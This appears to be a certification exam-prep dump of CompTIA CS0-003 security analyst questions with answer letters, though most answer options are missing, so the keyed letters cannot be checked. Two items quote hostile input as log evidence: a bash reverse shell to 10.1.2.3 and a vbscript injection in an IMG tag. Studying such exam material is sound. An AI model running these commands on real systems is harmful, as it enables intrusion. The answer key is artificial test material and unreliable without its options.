CompTIA's CS0-003 An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
#91
Answer: D
CompTIA's CS0-003 An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?
#92
Answer: C
CompTIA's CS0-003 A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?
#93
Answer: D
CompTIA's CS0-003 While reviewing web server logs, a security analyst found the following line:
< IMG SRC='vbscript:msgbox("test")' >
Which of the following malicious activities was attempted?
#94
Answer: D
CompTIA's CS0-003 A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site’s standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?
#95
Answer: D
CompTIA's CS0-003 A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?
#96
Answer: B
CompTIA's CS0-003 A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?
#97
Answer: A
CompTIA's CS0-003 A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?
#98
Answer: B
CompTIA's CS0-003 A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?
#99
Answer: B
CompTIA's CS0-003 An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?
#100
Answer: C
CompTIA's CS0-003 An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?
#101
Answer: A
CompTIA's CS0-003 An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?
#102
Answer: A
CompTIA's CS0-003 Which of the following describes the best reason for conducting a root cause analysis?
#103
Answer: D
CompTIA's CS0-003 Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
#104
Answer: C
CompTIA's CS0-003 A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement?
#105
Answer: D
CompTIA's CS0-003 A security analyst identified the following suspicious entry in the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm whether the activity is ongoing?
#106
Answer: D
CompTIA's CS0-003 A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?
#107
Answer: A
CompTIA's CS0-003 A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?
#108
Answer: B
CompTIA's CS0-003 A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?
#109
Answer: C
CompTIA's CS0-003 A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?
#110
Answer: B
CompTIA's CS0-003 A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below: Which of the following vulnerability types is the security analyst validating?
#111
Answer: C
CompTIA's CS0-003 Which of the following is the most important factor to ensure accurate incident response reporting?
#112
Answer: A
CompTIA's CS0-003 A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?
#113
Answer: C
CompTIA's CS0-003 A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?
#114
Answer: C
CompTIA's CS0-003 A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)
E. Evaluate the HELO or EHLO string of the connecting email server
F. Examine the SPF, DKIM, and DMARC fields from the original email
#115
Answer: B
CompTIA's CS0-003 A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?
#116
Answer: D
CompTIA's CS0-003 A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?
#117
Answer: A
CompTIA's CS0-003 Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
#118
Answer: C
CompTIA's CS0-003 An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?
#119
Answer: B
CompTIA's CS0-003 A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?